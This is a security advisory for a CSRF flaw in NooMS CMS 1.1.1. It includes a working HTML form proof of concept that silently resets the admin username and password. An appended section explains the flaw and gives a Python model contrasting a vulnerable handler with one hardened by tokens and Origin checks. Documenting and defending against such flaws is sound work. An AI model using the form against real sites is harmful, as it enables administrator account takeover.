# NooMS CMS version 1.1.1 CSRF
# Bug Found: April 9th 2011
# Found by: loneferret (as far as I know anyway)
# Software Download Link:
http://phpkode.com/download/p/2381_nooms_1.1.1.tar.bz2
# Nods to exploit-db Team
#
# Well, I didn't have much to do this morning so figured I'd try to see how
# fast it would take me to find one of these. It's nothing to write home about.
# I mean...come on! Who would use a CMS named NooMS? This thing uses a MySQL
# database as well, wouldn't be surprised if there are other things to be found.
# But I need to get some chores done before the wife starts.
#
# Enjoy,
# loneferret
#
# p.s:
# I wanted to contact the creator, but his page (using NooMS) is
# blank... nothing there so.. sorry.

---HTML STARTS HERE---

<!-- The admin preferences handler (admin.php, op=pref&action=edit) is reached
     with a plain POST that carries no anti-CSRF token. If a logged-in
     administrator loads this form from an attacker-controlled page and it is
     submitted, the browser attaches the admin session cookie and the values
     below overwrite the admin username, password and site settings. -->
<form action='http://[host]/admin.php' method='post'>
<input type=hidden name='op' value='pref'>
<input type=hidden name='action' value='edit'>
Admin Username:<input type=text size=20 name='admin_user' value=''><br>
Admin Password:<input type=text size=20 name='admin_pwd' value=''><br>
Site Name:<input type=text size=40 name='site_name' value=''><br>
Site URL:<input type=text size=40 name='site_url' value=''><br>
Number of results per page:<input type=text size=10 name='search_numr' value=''><br>
Lang:<input type=text size=10 name='lang' value='en'><br>
Theme:<input type=text name=template value='default'><input type=submit value='change'>
</form>
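What the form above achieves, and what would stop it, as an added example that is not part of loneferret's advisory and not NooMS code: a minimal model of a preference handler that, like the one the advisory targets, honours any POST with op=pref&action=edit because the session cookie rode along, placed beside the same handler hardened with a per-session synchronizer token and an Origin check. The forged POST the advisory's form produces is replayed against both. The handler shape, the session fields, the site origin and the attacker origin are all assumptions for illustration; NooMS' real admin.php is not reproduced here.

```python
"""Added example: model of a CSRF-prone preference handler and a hardened one.
Not NooMS code; handler, session layout and origins are assumed for illustration."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Callable, Optional, Tuple

SITE_ORIGIN = "http://cms.example"   # assumed origin of the CMS install


@dataclass
class Session:
    """Server-side session state selected by the victim's cookie (assumed shape)."""
    admin_user: str = "admin"
    admin_pwd: str = "original"
    # Synchronizer token: random per session, embedded in the site's own forms,
    # never readable from a cross-origin page.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    """The parts of an HTTP POST that matter for CSRF."""
    form: dict
    cookie_session: Session          # the browser attaches the cookie automatically
    origin: Optional[str] = None     # Origin header, if the browser sends one


def vulnerable_edit_prefs(req: Request) -> bool:
    """Handler as the advisory describes it: op/action are checked, nothing else.
    Whoever holds the admin session (cookie) can change the admin credentials."""
    if req.form.get("op") != "pref" or req.form.get("action") != "edit":
        return False
    s = req.cookie_session
    s.admin_user = req.form.get("admin_user", s.admin_user)
    s.admin_pwd = req.form.get("admin_pwd", s.admin_pwd)
    return True


def hardened_edit_prefs(req: Request) -> bool:
    """Same handler with two independent CSRF defenses:
    1. reject cross-origin requests when the browser sends an Origin header;
    2. require the session's synchronizer token, compared in constant time."""
    if req.origin is not None and req.origin != SITE_ORIGIN:
        return False
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, req.cookie_session.csrf_token):
        return False
    return vulnerable_edit_prefs(req)


def forged_request(victim: Session) -> Request:
    """The POST the advisory's form produces when a logged-in admin submits it
    from a page on attacker.example (assumed attacker origin): the attacker
    chooses every field, the browser adds the cookie, and no token is present
    because the attacker never saw one."""
    return Request(
        form={"op": "pref", "action": "edit",
              "admin_user": "attacker", "admin_pwd": "pwned",
              "site_name": "", "site_url": "", "search_numr": "",
              "lang": "en", "template": "default"},
        cookie_session=victim,
        origin="http://attacker.example",
    )


def run_attack(handler: Callable[[Request], bool]) -> Tuple[bool, str]:
    """Replay the forged POST against a handler; return (accepted, admin_pwd after)."""
    victim = Session()
    accepted = handler(forged_request(victim))
    return accepted, victim.admin_pwd


def run_legitimate(handler: Callable[[Request], bool]) -> Tuple[bool, str]:
    """A same-origin form that embeds the session's own token must still work."""
    victim = Session()
    req = Request(form={"op": "pref", "action": "edit",
                        "admin_pwd": "newpass", "csrf_token": victim.csrf_token},
                  cookie_session=victim, origin=SITE_ORIGIN)
    return handler(req), victim.admin_pwd


if __name__ == "__main__":
    print("vulnerable, forged POST :", run_attack(vulnerable_edit_prefs))     # (True, 'pwned')
    print("hardened, forged POST   :", run_attack(hardened_edit_prefs))       # (False, 'original')
    print("hardened, real admin    :", run_legitimate(hardened_edit_prefs))   # (True, 'newpass')
```

The token check is the defense that matters: the attacker's page can make the victim's browser send the cookie, but cannot read a value that only appears in pages served by the CMS itself. The Origin check is a cheap second layer, kept conditional because older clients omit the header; `hmac.compare_digest` avoids leaking the token through comparison timing.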